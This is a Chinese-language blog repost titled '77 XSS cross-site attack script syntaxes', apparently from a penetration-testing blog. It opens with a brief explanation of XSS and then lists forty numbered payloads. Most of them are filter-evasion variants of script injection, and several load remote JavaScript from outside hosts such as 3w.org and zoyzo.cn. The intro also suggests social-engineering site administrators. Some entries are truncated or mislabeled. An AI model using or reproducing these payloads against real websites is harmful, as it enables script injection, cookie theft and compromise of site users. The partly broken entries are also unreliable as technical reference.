渗透|Clown'sBlog

渗透-Clown'sBlog|渗透测试技巧|黑客攻防|0day公布

77种网站XSS跨站攻击脚本语法

X7ioSe'S Blog:

XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码
当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
XSS分两类:
一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞
另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。
如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开

  

(1)普通的XSS JavaScript注入

  

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

  

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

  

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>

  

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

  

(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>

  

(6)修正缺陷IMG标签
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

  

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

  

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S’)>

  

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S’)>

  

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

  

(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

  

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

  

(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>

  

(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>

  

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>

  

(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.zoyzo’</script>
<script>z=z+’.cn/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

  

(17)空字符
perl -e ‘print “<IMG SRC=javascript:alert(”XSS”)>”;’ > out

  

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCRIPT>alert(”XSS”)</SCRIPT>”;’ > out

  

(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>

  

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

  

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|]^=alert(“XSS”)>

  

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

  

(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

  

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

  

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

  

(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”

  

(27)双开角括号
<iframe src=http://3w.org/XSS.html>

  

(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

  

(29)换码过滤的JavaScript
[code]”;alert(‘XSS’);//

  

(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

  

(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>

  

(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

  

(33)BODY标签
<BODY(‘XSS’)>

  

(34)IMG Dynsrc
<IMG DYNSRC=”javascript:alert(‘XSS’)”>

  

(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>

  

(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>

  

(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

  

(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

  

(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

  

(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

  


评论
热度(12)
  1. Mr.L 's Blog默白‘S Blog 转载了此文字
  2. D ’ blog默白‘S Blog 转载了此文字
  3. 渗透|Clown'sBlog默白‘S Blog 转载了此文字

© 渗透|Clown'sBlog | Powered by LOFTER